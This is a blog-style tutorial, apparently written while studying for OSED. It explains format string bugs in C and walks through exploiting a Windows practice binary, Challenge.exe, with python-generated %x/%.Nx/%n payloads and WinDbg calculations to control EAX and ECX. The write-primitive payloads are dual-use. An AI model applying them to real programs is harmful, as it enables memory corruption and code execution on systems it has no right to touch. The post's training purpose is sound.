Skip to main content

Format String Vulnerability

·5 mins

I am continuing again training my skills for OSED certification and one of the vulnerability classes part of C or C++ language, the course covers format specifier vulnerability.

Understanding the vulnerability #

First Scenario #

If the user input data is passed directly to the printf as a format string specifier that code is vulnerable to format string specifier attack.

The code below is a classic example of format string vulnerability.

char user_input[100];
fgets(user_input, sizeof(user_input), stdin);
printf(user_input)

Second Scenario #

If the format string specifier mistmatch with number of arguments unexpected behaviour such as printing sensitive data from the stack or overwriting the stack with garbage data.

The code below is an example, the number of format string specifier is 2 and argument provided is only 1 the user input, the second %s can potentially leak sensitive data, garbage data or read an invalid memory address causing a crash:

printf("Hello pentesthacks, %s and %s", input_user)

Format String Challenge #

Format string challenge #

I found a really good challenge to understand the Format String Vulnerability concept, you can check the original author post and download the Challenge.exe if you want to follow along Exploiting Format strings in Windows.

If you try to run the program, you can see it will try to open the string provided in the first argument. We can then learn that the software expect a filename, another observation is that after expecting a file, it will read the file content and print back on the screen the filename and also the content of the file.

We could use two approaches to uncover vulnerabilities, first reverse engineer the software using a disassembler to understand the software or write a fuzzer or use an available fuzzer that will attempt several inputs randomly focusing to crash the software to uncover possible vulnerabilities, we will look the first option using IDA Free.

Reversing with IDA Free #

The vulnerability lies as discussed earlier First Scenario, the user input is passed directly to the printf function, you can observe that on the push eax instruction, this instruction allow the user to manipulate the format string specifier.

Exploiting the format string vulnerability #

We can experiment the format specifier to have a sense of the vulnerability the following format string specifiers mainly used in this type of vulnerability:

Format String Specifier Description
%x The %x format string specifier will convert the decimal number in hexadecimal values on the stack, %x in the context of format string attack will display values in the stack in hexdecimal format.
%n The %n format string specifier will write number of characters preceding the %n
%s The %s will read a memory pointer of array of characters and printf will display the string.

There are more format string specifiers such as %d, %p etc.. you can look official documentation here.

Let’s go back to the challenge, we can play by sending A’s followed by %x format string specifier if the software is vulmerable to format string specifiers we should see some values printed out of %x in hex decimal value.

.\Challenge.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x

screenshot:

We use windbg to see what is going on

The payload

python -c "print('A'*300 + '%x'*161 + '%n')"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n

The screenshot of windbg capturing the crash.

By manipulating the %x and increaing the A or decreasing we can see we can manipulate the eax, also the ecx we control. A few things to take in consideration by incrasing the number of %x we can point the eax value to our shellcode.

python -c "print('A'*300 + '%x'*151 + '%n'+ 'B'*4)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%nBBBB

Below shows by adjusting the %x (increasing) we can control eax

The idea here is replace eax pointing to return address and try to control ecx, if we control ecx the idea is point ecx to our shellcode, once the function returns the eax will return and the shellcode will be executated since the return address will be pointing to our shellcode.

Lets try to control ecx, we will first need to find the beginning of ours A’s. The address is 0x14f748. We can divide by 4 using windbg and place the decimal value as part of our shellcode multiplied by 4.

0:000> ? 0x14f748 / 4
Evaluate expression: 343506 = 00053dd2

The value %.343506x * 4 can be placed as part of the payload:

python -c "print('A'*300 + '%x'*151 + '%.343506x' * 4 + '%n'+ 'B'*4)"

After running the payload again ecx is now pointing to 0x14fd2c and eax is off from our BBBBs. We can fix EAX by increasing %x and ecx value 0x14fd2c we need to substract with payload address 0x14f748 and adding the decimal value from previously calculation.

0:000> ? 0x14fd2c - 0x14f748
Evaluate expression: 1508 = 000005e4

0:000> ? 0n343506 + 0n1508
Evaluate expression: 345014 = 000543b6

The 4th value we will use in the payload: 345014, I also ajusted the number of %x to point eax to our ‘B’*4.
Note.: The calculation must be in decimal and values presented in the format string specifier %.45014x always decimal base.

 python -c "print('A'*300 + '%x'*161 + '%.343506x' * 3 + '%.345014x' + '%n'+ 'B'*4)"

We see now that ecx contains the value 0x150360, we need to substract by the payload address 0x14f748 and because 0x150360 is a higher number we will substract it by previous calculated value in the payload 345014 (decimal value).

Note.: The reason we are substracting the previous payload decimal value: “? n345014 - 0n3096” is because the ecx value 0x150360 is higher than the address where our payload is sitting in the memory: 0x14f748.

0:000> ? 0x150360 - 0x14f748
Evaluate expression: 3096 = 00000c18

0:000> ? 0n345014 - 0n3096
Evaluate expression: 341918 = 0005379e

Running the python command again and feeding the program, we can see we successfully pointed ecx to our payload address and ecx is pointing to our 0x42424242 (BBBB).

python -c "print('A'*300 + '%x'*161 + '%.343506x' * 3 + '%.341918x' + '%n'+ 'B'*4)"

As a challenge you can try to move forward and find bad chars, replace the 0x41414141 with actual something like spawning a calculator. You have to replace eax with return adddress.

I hope this will be helpful to somebody trying to understand format string vulnerabilities.

😀 Bye for now.